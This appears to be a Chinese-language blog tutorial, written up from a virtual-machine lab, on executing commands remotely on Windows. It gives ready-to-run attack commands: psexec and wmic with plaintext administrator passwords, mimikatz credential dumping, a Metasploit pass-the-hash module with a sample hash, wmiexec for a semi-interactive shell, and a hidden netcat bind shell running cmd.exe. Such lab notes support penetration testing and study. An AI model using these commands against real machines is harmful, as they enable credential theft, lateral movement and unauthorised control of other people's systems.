Windows遠程執行命令

環境:Win10、Win7虛擬機

Windows遠程命令執行

1、psexec.exe遠程執行命令

psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe

這裏一開始登陸的是另一個管理員賬號,但是一直被拒絕訪問,後來把Administrator賬號取消隱藏,一下就連接上。之後看到一篇文章也有一樣的情況,只有Administrator賬號才能連接,就算是管理員用戶組的其他用戶也不能連接,UAC的問題。

2、使用Hash登陸Windows

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

或者使用wce抓取hash值:

msf調用payload:

use exploit/windows/smb/psexec
show options
set RHOST 192.168.30.128
Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
set SMBUser Administrator
show options
Run

3、利用wmiexec工具配合進行反彈半交互shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789

還可以單條命令執行

4、WMI執行命令方式,無回顯

wmic /node:192.168.30.128 /user:Administrator /password:123456789  process call create "cmd.exe /c ipconfig>c:\result.txt"

執行成功後可以在被控制的機器裏面找到執行結果的文件

5、nc遠程執行

先在被控機器上開啓監聽,-L:讓監聽者在連接多次掉線時仍堅持監聽,-d:讓nc隱藏運行,-e:指定要運行的程序,-p:監聽的端口

nc.exe -L -d -e cmd.exe -p 5555

控制端運行nc64.exe 192.168.30.128 5555

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章